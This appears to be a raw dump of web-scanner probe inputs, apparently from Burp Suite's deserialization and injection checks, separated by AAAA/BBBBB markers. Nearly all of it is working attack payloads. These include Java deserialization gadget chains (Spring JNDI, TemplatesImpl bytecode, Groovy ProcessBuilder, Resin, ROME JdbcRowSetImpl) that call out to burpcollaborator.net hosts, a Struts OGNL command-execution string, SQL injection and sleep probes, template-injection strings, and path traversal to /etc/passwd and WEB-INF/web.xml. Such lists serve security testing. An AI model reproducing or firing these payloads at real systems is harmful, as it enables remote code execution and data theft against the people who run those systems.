["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://wvv7za2roks36gxais72ba3pyg49sy.burpcollaborator.net/"]}],"adviceBeanName":"ldap://wvv7za2roks36gxais72ba3pyg49sy.burpcollaborator.net/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]
AAAA
BBBBB|zq=%253c%2561%2560%2527%2522%2524%257b%257b%255c
4d2hxim9eq��1qibjwnxt9
BBBBB
AAAA
["org.springframework.beans.factory.config.PropertyPathFactoryBean",{"targetBeanName":"ldap://vji6n9qqcjg2ufl96rv1z9romfs9gy.burpcollaborator.net/","propertyPath":"foo","beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://vji6n9qqcjg2ufl96rv1z9romfs9gy.burpcollaborator.net/"]}]}]
AAAA' and '5948'='5948
BBBBB
AAAA
BBBBB
AAAA' and '9442'='9451
BBBBB
AAAA' and '8847'='8847
BBBBB
AAAA
m9ehf60`z'z"${{%25{{\
AAAA
["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",{"transletBytecodes":["yv66vgAAADQAJQoABwATCgAUABUIABYKABQAFwoAGAAZBwAaBwAbAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHABwBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEAEktydWVnZXJLb2ZmZWUuamF2YQwACAAJBwAdDAAeAB8BAMhuc2xvb2t1cCBmNGtxOHRiYXgzMW1mejZ0cmJnbGt0Yzg3emR1MWouYnVycGNvbGxhYm9yYXRvci5uZXQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAwAIAAhBwAiDAAjACQBAA1LcnVlZ2VyS29mZmVlAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAAd3YWl0Rm9yAQADKClJACEABgAHAAAAAAADAAEACAAJAAIACgAAADEAAgABAAAAESq3AAG4AAISA7YABLYABVexAAAAAQALAAAADgADAAAAAgAEAAMAEAAEAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAACAABAA4AEAABAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAADAABABEAAAACABI="],"transletName":"a.b","outputProperties":{}}]
AAAA
BBBBB
g7mxjfdzn1%41ycimbltvdv
BBBBB
AAAA
{"@type":"Freddy"}
AAAA
ulkl5k227d7\z`z'z"${{%25{{\
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
g7mxjfdzn1%41ycimbltvdv
BBBBB
AAAA
{"@type":"java.util.Arrays$ArrayList","@items":[{"@id":2,"@type":"groovy.util.Expando","expandoProperties":{"@type":"java.util.HashMap","hashCode":{"@type":"org.codehaus.groovy.runtime.MethodClosure","method":"start","delegate":{"@id":1,"@type":"java.lang.ProcessBuilder","command":{"@type":"java.util.ArrayList","@items":["cmd", "/c", "ping -n 21 127.0.0.1"]},"directory":null,"environment":null,"redirectErrorStream":false,"redirects":null},"owner":{"@ref":1},"thisObject":null,"resolveStrategy":0,"directive":0,"parameterTypes":[],"maximumNumberOfParameters":0,"bcw":null}}},{"@type":"java.util.HashMap","@keys":[{"@ref":2},{"@ref":2}],"@items":[{"@ref":2},{"@ref":2}]}]}
AAAA
BBBBB
AAAA
BBBBB
AAAA
{"@type":"java.util.Arrays$ArrayList","@items":[{"@id":2,"@type":"groovy.util.Expando","expandoProperties":{"@type":"java.util.HashMap","hashCode":{"@type":"org.codehaus.groovy.runtime.MethodClosure","method":"start","delegate":{"@id":1,"@type":"java.lang.ProcessBuilder","command":{"@type":"java.util.ArrayList","@items":["ping", "-c", "21", "127.0.0.1"]},"directory":null,"environment":null,"redirectErrorStream":false,"redirects":null},"owner":{"@ref":1},"thisObject":null,"resolveStrategy":0,"directive":0,"parameterTypes":[],"maximumNumberOfParameters":0,"bcw":null}}},{"@type":"java.util.HashMap","@keys":[{"@ref":2},{"@ref":2}],"@items":[{"@ref":2},{"@ref":2}]}]}
tdcr8frlxr\\la8b7mn44v
BBBBB
AAAA
{"@type":"java.util.Arrays$ArrayList","@items":[{"@id":2,"@type":"groovy.util.Expando","expandoProperties":{"@type":"java.util.HashMap","hashCode":{"@type":"org.codehaus.groovy.runtime.MethodClosure","method":"start","delegate":{"@id":1,"@type":"java.lang.ProcessBuilder","command":{"@type":"java.util.ArrayList","@items":["nslookup", "dubh9ivr41kem56xseavouu3suykm9.burpcollaborator.net"]},"directory":null,"environment":null,"redirectErrorStream":false,"redirects":null},"owner":{"@ref":1},"thisObject":null,"resolveStrategy":0,"directive":0,"parameterTypes":[],"maximumNumberOfParameters":0,"bcw":null}}},{"@type":"java.util.HashMap","@keys":[{"@ref":2},{"@ref":2}],"@items":[{"@ref":2},{"@ref":2}]}]}
AAAA
BBBBB
AAAA
{"@type":"java.util.Arrays$ArrayList","@items":[{"@id":2,"@type":"jdk.nashorn.internal.objects.NativeString","value":{"@type":"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data","dataHandler":{"dataSource":{"@type":"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource","contentType":null,"is":{"@type":"javax.crypto.CipherInputStream","cipher":{"@type":"javax.crypto.NullCipher","provider":null,"spi":null,"transformation":null,"cryptoPerm":null,"exmech":null,"initialized":false,"opmode":0,"firstSpi":null,"firstService":null,"serviceIterator":{"@type":"sun.misc.Service$LazyIterator","service":null,"loader":null,"configs":{"@type":"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl","candidates":{"@type":"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl","candidates":null,"nextMatch":{"attrs":null,"boundObj":{"@type":"javax.naming.spi.ContinuationDirContext","cpe":{"@id":1,"remainingNewName":null,"environment":null,"altName":null,"altNameCtx":null,"resolvedName":null,"resolvedObj":{"@type":"javax.naming.Reference","className":"Foo","addrs":[],"classFactory":"Freddy","classFactoryLocation":"http://9jtdyekntx9ab1vthazrdqjzhqnhb6.burpcollaborator.net/"},"remainingName":null,"rootException":null,"detailMessage":null,"cause":{"@ref":1},"stackTrace":[],"suppressedExceptions":{"@type":"java.util.Collections$UnmodifiableRandomAccessList"}},"env":null,"contCtx":null},"name":"foo","className":null,"fullName":null,"isRel":true},"cons":null,"filter":null,"context":null,"env":null,"useFactory":false},"nextMatch":null,"cons":{"searchScope":1,"timeLimit":0,"derefLink":false,"returnObj":false,"countLimit":0,"attributesToReturn":null},"filter":null,"context":null,"env":null,"useFactory":true},"pending":null,"returned":{"@type":"java.util.TreeSet"},"nextName":null},"transforms":null,"lock":{}},"input":{"@type":"java.lang.ProcessBuilder$NullInputStream"},"ibuffer":[],"done":false,"obuffer":null,"ostart":0,"ofinish":0,"closed":false,"in":null},"consumed":false},"objDataSource":null,"object":null,"objectMimeType":null,"currentCommandMap":null,"transferFlavors":[],"dataContentHandler":null,"factoryDCH":null,"oldFactory":null,"shortType":null},"data":null,"dataLen":0,"mimeType":null},"map":null,"proto":null,"flags":0,"primitiveSpill":null,"objectSpill":null,"arrayData":null},{"@type":"java.util.HashMap","@keys":[{"@ref":2},{"@ref":2}],"@items":[{"@ref":2},{"@ref":2}]}]}
tdcr8frlxr\\la8b7mn44v
BBBBB
AAAA
{"@type":"java.util.HashMap","@keys":[{"@id":2,"@type":"com.caucho.naming.QName","_context":{"@type":"javax.naming.spi.ContinuationDirContext","cpe":{"remainingNewName":null,"environment":null,"altName":null,"altNameCtx":null,"resolvedName":null,"resolvedObj":{"@type":"javax.naming.Reference","className":"Foo","addrs":[],"classFactory":"Freddy","classFactoryLocation":"http://pe7ttuf3od4q6hq9cqu786efc6iy6n.burpcollaborator.net/"},"remainingName":null,"rootException":null,"detailMessage":null,"cause":null,"stackTrace":null,"suppressedExceptions":null},"env":{},"contCtx":null},"_items":["foo","bar"]},{"@id":1,"@type":"com.sun.org.apache.xpath.internal.objects.XString","m_obj":"?\u000F\u001A\u000B","m_parent":null}],"@items":[{"@ref":2},{"@ref":1}]}
AAAA
BBBBB
8zqiij6kazAzwys1l5mdl
BBBBB
AAAA
BBBBB
/wH/
BBBBB
��
BBBBB
hfgfdg
BBBBB
AAAA
BBBBB
AAAA
oudb''fqbh
AAAA
BBBBB
AAAA
@(9687*5793)
AAAA
BBBBB
AAAA
a'a\'b"c>?>%}}%%>c<[[?${{%}}cake\
AAAA
BBBBB
AAAA
t1oak2k94xse
AAAA
BBBBB
AAAA
{!xmlparser v=''}
AAAA
BBBBB
AAAA
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping o8xsmo0iwoaymbnj34zsa5jmmds3gs.burpcollaborator.net -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
AAAA
BBBBB
AAAA
.../....///.../....///.../....///.../....///.../....///.../....///etc/passwd
AAAA
BBBBB
AAAA
ldap://d1foy2pd6ycyhrusqlyexdsumlscg1.burpcollaborator.net/fooldap://d1foy2pd6ycyhrusqlyexdsumlscg1.burpcollaborator.net/
AAAA
.../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd
AAAA
BBBBB
AAAA
{"class":""}
AAAA
file:///etc/passwd
AAAA
BBBBB
AAAA
{"@class":""}
AAAA
%2fetc%2fpasswd
AAAA
BBBBB
AAAA
../../../../WEB-INF/web.xml
AAAA
BBBBB
AAAA
AA==
AAAA
../../../WEB-INF/web.xml
AAAA
BBBBB
AAAA
BBBBB
AAAA
MtMtcom.caucho.naming.QNameS_contextMt'javax.naming.spi.ContinuationDirContextScpeMt#javax.naming.CannotProceedExceptionS rootExceptionNS detailMessageNScauseNSremainingNewNameNSenvironmentNSaltNameNS altNameCtxNS resolvedNameNSresolvedObjMtjavax.naming.ReferenceS classNameSFooS classFactorySFreddySclassFactoryLocationS�http://g1iopc7nu698hedn4xmkmgbwcnid62.burpcollaborator.net/ SaddrsVtjava.util.VectorlzzS remainingNameNS stackTraceVt[java.lang.StackTraceElementl Mtjava.lang.StackTraceElementSdeclaringClassSmarshalsec.gadgets.ResinS methodNameSmakeResinQNameSfileNameS Resin.javaS lineNumberI8zMtjava.lang.StackTraceElementSdeclaringClassS$sun.reflect.NativeMethodAccessorImplS methodNameSinvoke0SfileNameNS lineNumberI����zMtjava.lang.StackTraceElementSdeclaringClassS$sun.reflect.NativeMethodAccessorImplS methodNameSinvokeSfileNameNS lineNumberI����zMtjava.lang.StackTraceElementSdeclaringClassS(sun.reflect.DelegatingMethodAccessorImplS methodNameSinvokeSfileNameNS lineNumberI����zMtjava.lang.StackTraceElementSdeclaringClassSjava.lang.reflect.MethodS methodNameSinvokeSfileNameNS lineNumberI����zMtjava.lang.StackTraceElementSdeclaringClassSmarshalsec.MarshallerBaseS methodNameS createObjectSfileNameSMarshallerBase.javaS lineNumberIKzMtjava.lang.StackTraceElementSdeclaringClassSmarshalsec.MarshallerBaseS methodNameSdoRunSfileNameSMarshallerBase.javaS lineNumberI�zMtjava.lang.StackTraceElementSdeclaringClassSmarshalsec.MarshallerBaseS methodNameSrunSfileNameSMarshallerBase.javaS lineNumberIyzMtjava.lang.StackTraceElementSdeclaringClassSmarshalsec.HessianS methodNameSmainSfileNameS Hessian.javaS lineNumberI@zzSsuppressedExceptionsNzSenvMtjava.util.HashtablezScontCtxNzS_itemsVlSfooSbarzzRMt1com.sun.org.apache.xpath.internal.objects.XStringSm_objS맦Sm_parentNzRz
AAAA
../../WEB-INF/web.xml
AAAA
BBBBB
AAAA"
BBBBB
AAAA
TXQAAE10ABdjb20uY2F1Y2hvLm5hbWluZy5RTmFtZVMACF9jb250ZXh0TXQAJ2phdmF4Lm5hbWluZy5zcGkuQ29udGludWF0aW9uRGlyQ29udGV4dFMAA2NwZU10ACNqYXZheC5uYW1pbmcuQ2Fubm90UHJvY2VlZEV4Y2VwdGlvblMADXJvb3RFeGNlcHRpb25OUwANZGV0YWlsTWVzc2FnZU5TAAVjYXVzZU5TABByZW1haW5pbmdOZXdOYW1lTlMAC2Vudmlyb25tZW50TlMAB2FsdE5hbWVOUwAKYWx0TmFtZUN0eE5TAAxyZXNvbHZlZE5hbWVOUwALcmVzb2x2ZWRPYmpNdAAWamF2YXgubmFtaW5nLlJlZmVyZW5jZVMACWNsYXNzTmFtZVMAA0Zvb1MADGNsYXNzRmFjdG9yeVMABkZyZWRkeVMAFGNsYXNzRmFjdG9yeUxvY2F0aW9uUwDIaHR0cDovL2Nicmt6OGhqNDJqNHJhbmpldHdnd2Nsc21qc2Fnei5idXJwY29sbGFib3JhdG9yLm5ldC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTAAVhZGRyc1Z0ABBqYXZhLnV0aWwuVmVjdG9ybAAAAAB6elMADXJlbWFpbmluZ05hbWVOUwAKc3RhY2tUcmFjZVZ0ABxbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50bAAAAAlNdAAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50UwAOZGVjbGFyaW5nQ2xhc3NTABhtYXJzaGFsc2VjLmdhZGdldHMuUmVzaW5TAAptZXRob2ROYW1lUwAObWFrZVJlc2luUU5hbWVTAAhmaWxlTmFtZVMAClJlc2luLmphdmFTAApsaW5lTnVtYmVySQAAADh6TXQAG2phdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudFMADmRlY2xhcmluZ0NsYXNzUwAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsUwAKbWV0aG9kTmFtZVMAB2ludm9rZTBTAAhmaWxlTmFtZU5TAApsaW5lTnVtYmVySf////56TXQAG2phdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudFMADmRlY2xhcmluZ0NsYXNzUwAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsUwAKbWV0aG9kTmFtZVMABmludm9rZVMACGZpbGVOYW1lTlMACmxpbmVOdW1iZXJJ/////3pNdAAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50UwAOZGVjbGFyaW5nQ2xhc3NTAChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsUwAKbWV0aG9kTmFtZVMABmludm9rZVMACGZpbGVOYW1lTlMACmxpbmVOdW1iZXJJ/////3pNdAAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50UwAOZGVjbGFyaW5nQ2xhc3NTABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2RTAAptZXRob2ROYW1lUwAGaW52b2tlUwAIZmlsZU5hbWVOUwAKbGluZU51bWJlckn/////ek10ABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRTAA5kZWNsYXJpbmdDbGFzc1MAGW1hcnNoYWxzZWMuTWFyc2hhbGxlckJhc2VTAAptZXRob2ROYW1lUwAMY3JlYXRlT2JqZWN0UwAIZmlsZU5hbWVTABNNYXJzaGFsbGVyQmFzZS5qYXZhUwAKbGluZU51bWJlckkAAAFLek10ABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRTAA5kZWNsYXJpbmdDbGFzc1MAGW1hcnNoYWxzZWMuTWFyc2hhbGxlckJhc2VTAAptZXRob2ROYW1lUwAFZG9SdW5TAAhmaWxlTmFtZVMAE01hcnNoYWxsZXJCYXNlLmphdmFTAApsaW5lTnVtYmVySQAAAKV6TXQAG2phdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudFMADmRlY2xhcmluZ0NsYXNzUwAZbWFyc2hhbHNlYy5NYXJzaGFsbGVyQmFzZVMACm1ldGhvZE5hbWVTAANydW5TAAhmaWxlTmFtZVMAE01hcnNoYWxsZXJCYXNlLmphdmFTAApsaW5lTnVtYmVySQAAAHl6TXQAG2phdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudFMADmRlY2xhcmluZ0NsYXNzUwASbWFyc2hhbHNlYy5IZXNzaWFuUwAKbWV0aG9kTmFtZVMABG1haW5TAAhmaWxlTmFtZVMADEhlc3NpYW4uamF2YVMACmxpbmVOdW1iZXJJAAAAQHp6UwAUc3VwcHJlc3NlZEV4Y2VwdGlvbnNOelMAA2Vudk10ABNqYXZhLnV0aWwuSGFzaHRhYmxlelMAB2NvbnRDdHhOelMABl9pdGVtc1ZsAAAAAlMAA2Zvb1MAA2Jhcnp6UgAAAAFNdAAxY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWFN0cmluZ1MABW1fb2JqUwAE66emDxoLUwAIbV9wYXJlbnROelIAAAASeg==
AAAA
../WEB-INF/web.xml
AAAA
BBBBB
AAAA
BBBBB
AAAA
MtMt'com.rometools.rome.feed.impl.EqualsBeanS beanClassMtjava.lang.ClassSnameS)com.rometools.rome.feed.impl.ToStringBeanzSobjMt)com.rometools.rome.feed.impl.ToStringBeanS beanClassMtjava.lang.ClassSnameScom.sun.rowset.JdbcRowSetImplzSobjMtcom.sun.rowset.JdbcRowSetImplScommandNSURLNS dataSourceS�ldap://yjl67up5corqzwv5mf424yteu50xom.burpcollaborator.net/ S rowSetTypeI�SshowDeletedFS queryTimeoutISmaxRowsIS maxFieldSizeISconcurrencyI�SreadOnlyTSescapeProcessingTS isolationISfetchDirI�S fetchSizeISconnNSpsNSrsNSrowsMDNSresMDNS iMatchColumnsVtjava.util.Vectorl I����I����I����I����I����I����I����I����I����I����zSstrMatchColumnsVtjava.util.Vectorl SfooNNNNNNNNNzS binaryStreamNS unicodeStreamNSasciiStreamNS charStreamNSmapNS listenersNSparamsMtjava.util.HashtablezzzzRRRz
AAAA
%c0%ae/WEB-INF/web.xml
AAAA'+sleep(20.to_i)+'
BBBBB
AAAA
TXQAAE10ACdjb20ucm9tZXRvb2xzLnJvbWUuZmVlZC5pbXBsLkVxdWFsc0JlYW5TAAliZWFuQ2xhc3NNdAAPamF2YS5sYW5nLkNsYXNzUwAEbmFtZVMAKWNvbS5yb21ldG9vbHMucm9tZS5mZWVkLmltcGwuVG9TdHJpbmdCZWFuelMAA29iak10ACljb20ucm9tZXRvb2xzLnJvbWUuZmVlZC5pbXBsLlRvU3RyaW5nQmVhblMACWJlYW5DbGFzc010AA9qYXZhLmxhbmcuQ2xhc3NTAARuYW1lUwAdY29tLnN1bi5yb3dzZXQuSmRiY1Jvd1NldEltcGx6UwADb2JqTXQAHWNvbS5zdW4ucm93c2V0LkpkYmNSb3dTZXRJbXBsUwAHY29tbWFuZE5TAANVUkxOUwAKZGF0YVNvdXJjZVMAyGxkYXA6Ly83NWFmdDNiZXl4ZHpsNWhlOG9xYnE3Zm5nZW03YXcuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUwAKcm93U2V0VHlwZUkAAAPsUwALc2hvd0RlbGV0ZWRGUwAMcXVlcnlUaW1lb3V0SQAAAABTAAdtYXhSb3dzSQAAAABTAAxtYXhGaWVsZFNpemVJAAAAAFMAC2NvbmN1cnJlbmN5SQAAA/BTAAhyZWFkT25seVRTABBlc2NhcGVQcm9jZXNzaW5nVFMACWlzb2xhdGlvbkkAAAACUwAIZmV0Y2hEaXJJAAAD6FMACWZldGNoU2l6ZUkAAAAAUwAEY29ubk5TAAJwc05TAAJyc05TAAZyb3dzTUROUwAFcmVzTUROUwANaU1hdGNoQ29sdW1uc1Z0ABBqYXZhLnV0aWwuVmVjdG9ybAAAAApJ/////0n/////Sf////9J/////0n/////Sf////9J/////0n/////Sf////9J/////3pTAA9zdHJNYXRjaENvbHVtbnNWdAAQamF2YS51dGlsLlZlY3RvcmwAAAAKUwADZm9vTk5OTk5OTk5OelMADGJpbmFyeVN0cmVhbU5TAA11bmljb2RlU3RyZWFtTlMAC2FzY2lpU3RyZWFtTlMACmNoYXJTdHJlYW1OUwADbWFwTlMACWxpc3RlbmVyc05TAAZwYXJhbXNNdAATamF2YS51dGlsLkhhc2h0YWJsZXp6enpSAAAAAVIAAAABUgAAAAF6
AAAAf3kr69dkt3><
BBBBB
AAAA
BBBBB
AAAAf3kr69dkt3%3e%3c
BBBBB
AAAAf3kr69dkt3><
BBBBB
AAAAaffmosl7hw
BBBBB
AAAAaffmo%3ca%3esl7hw
BBBBB
AAAA
%c0%ae/%c0%ae/WEB-INF/web.xml
AAAA
MtMtAorg.springframework.aop.support.DefaultBeanFactoryPointcutAdvisorSadviceBeanNameS�ldap://xqr5etw4jnyp6v24teb1bx0d147yvn.burpcollaborator.net/ SorderNSpointcutMt$org.springframework.aop.TruePointcutzSbeanFactoryMt6org.springframework.jndi.support.SimpleJndiBeanFactorySresourceRefTSshareableResourcesVtjava.util.HashSetlS�ldap://xqr5etw4jnyp6v24teb1bx0d147yvn.burpcollaborator.net/ zSsingletonObjectsMtzS resourceTypesMtzSloggerMt'org.apache.commons.logging.impl.NoOpLogzS jndiTemplateMt%org.springframework.jndi.JndiTemplateSloggerMt'org.apache.commons.logging.impl.NoOpLogzSenvironmentNzzzRMtAorg.springframework.aop.support.DefaultBeanFactoryPointcutAdvisorSadviceBeanNameNSorderNSpointcutRSbeanFactoryNzR z
AAAA
%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml
AAAA
BBBBB
AAAA
TXQAAE10AEFvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5zdXBwb3J0LkRlZmF1bHRCZWFuRmFjdG9yeVBvaW50Y3V0QWR2aXNvclMADmFkdmljZUJlYW5OYW1lUwDIbGRhcDovL28wcHdvazZ2dGU4Z2dtY3YzNWxzbG9hNGJ2aHE1Zi5idXJwY29sbGFib3JhdG9yLm5ldC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTAAVvcmRlck5TAAhwb2ludGN1dE10ACRvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5UcnVlUG9pbnRjdXR6UwALYmVhbkZhY3RvcnlNdAA2b3JnLnNwcmluZ2ZyYW1ld29yay5qbmRpLnN1cHBvcnQuU2ltcGxlSm5kaUJlYW5GYWN0b3J5UwALcmVzb3VyY2VSZWZUUwASc2hhcmVhYmxlUmVzb3VyY2VzVnQAEWphdmEudXRpbC5IYXNoU2V0bAAAAAFTAMhsZGFwOi8vbzBwd29rNnZ0ZThnZ21jdjM1bHNsb2E0YnZocTVmLmJ1cnBjb2xsYWJvcmF0b3IubmV0LyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpTABBzaW5nbGV0b25PYmplY3RzTXQAAHpTAA1yZXNvdXJjZVR5cGVzTXQAAHpTAAZsb2dnZXJNdAAnb3JnLmFwYWNoZS5jb21tb25zLmxvZ2dpbmcuaW1wbC5Ob09wTG9nelMADGpuZGlUZW1wbGF0ZU10ACVvcmcuc3ByaW5nZnJhbWV3b3JrLmpuZGkuSm5kaVRlbXBsYXRlUwAGbG9nZ2VyTXQAJ29yZy5hcGFjaGUuY29tbW9ucy5sb2dnaW5nLmltcGwuTm9PcExvZ3pTAAtlbnZpcm9ubWVudE56enpSAAAAAU10AEFvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5zdXBwb3J0LkRlZmF1bHRCZWFuRmFjdG9yeVBvaW50Y3V0QWR2aXNvclMADmFkdmljZUJlYW5OYW1lTlMABW9yZGVyTlMACHBvaW50Y3V0UgAAAAJTAAtiZWFuRmFjdG9yeU56UgAAAAp6
AAAA
%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml
AAAA
MtMt7org.springframework.aop.target.HotSwappableTargetSourceStargetMtnorg.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolderSadvisorMt6org.springframework.aop.aspectj.AspectJPointcutAdvisorSorderNSadviceMt3org.springframework.aop.aspectj.AspectJAroundAdviceSdeclaringClassMtjava.lang.ClassSnameSjava.lang.ObjectzS methodNameStoStringS aspectNameNSdeclarationOrderIS throwingNameNS returningNameNSdiscoveredReturningTypeNSdiscoveredThrowingTypeNSjoinPointArgumentIndexIS joinPointStaticPartArgumentIndexISargumentsIntrospectedFSdiscoveredReturningGenericTypeNSparameterTypesVt[java.lang.ClasslzSpointcutNSaspectInstanceFactoryMtKorg.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactorySnameS�ldap://4z4cn05bsu7wf2bb2lk8k49kabg74w.burpcollaborator.net/ SbeanFactoryMt6org.springframework.jndi.support.SimpleJndiBeanFactorySresourceRefTSshareableResourcesVtjava.util.HashSetlS�ldap://4z4cn05bsu7wf2bb2lk8k49kabg74w.burpcollaborator.net/ zSsingletonObjectsMtzS resourceTypesMtzSloggerMt'org.apache.commons.logging.impl.NoOpLogzS jndiTemplateMt%org.springframework.jndi.JndiTemplateSloggerMt'org.apache.commons.logging.impl.NoOpLogzSenvironmentNzzSaspectMetadataNzS argumentNamesNSargumentBindingsNzSpointcutNzS comparatorNzzRMt7org.springframework.aop.target.HotSwappableTargetSourceStargetMt1com.sun.org.apache.xpath.internal.objects.XStringSm_objSꬣ Sm_parentNzzRz
AAAA
../../../WEB-INF/web.xml;x=
AAAA
BBBBB
AAAA
TXQAAE10ADdvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC50YXJnZXQuSG90U3dhcHBhYmxlVGFyZ2V0U291cmNlUwAGdGFyZ2V0TXQAbm9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmFzcGVjdGouYXV0b3Byb3h5LkFzcGVjdEpBd2FyZUFkdmlzb3JBdXRvUHJveHlDcmVhdG9yJFBhcnRpYWxseUNvbXBhcmFibGVBZHZpc29ySG9sZGVyUwAHYWR2aXNvck10ADZvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5hc3BlY3RqLkFzcGVjdEpQb2ludGN1dEFkdmlzb3JTAAVvcmRlck5TAAZhZHZpY2VNdAAzb3JnLnNwcmluZ2ZyYW1ld29yay5hb3AuYXNwZWN0ai5Bc3BlY3RKQXJvdW5kQWR2aWNlUwAOZGVjbGFyaW5nQ2xhc3NNdAAPamF2YS5sYW5nLkNsYXNzUwAEbmFtZVMAEGphdmEubGFuZy5PYmplY3R6UwAKbWV0aG9kTmFtZVMACHRvU3RyaW5nUwAKYXNwZWN0TmFtZU5TABBkZWNsYXJhdGlvbk9yZGVySQAAAABTAAx0aHJvd2luZ05hbWVOUwANcmV0dXJuaW5nTmFtZU5TABdkaXNjb3ZlcmVkUmV0dXJuaW5nVHlwZU5TABZkaXNjb3ZlcmVkVGhyb3dpbmdUeXBlTlMAFmpvaW5Qb2ludEFyZ3VtZW50SW5kZXhJAAAAAFMAIGpvaW5Qb2ludFN0YXRpY1BhcnRBcmd1bWVudEluZGV4SQAAAABTABVhcmd1bWVudHNJbnRyb3NwZWN0ZWRGUwAeZGlzY292ZXJlZF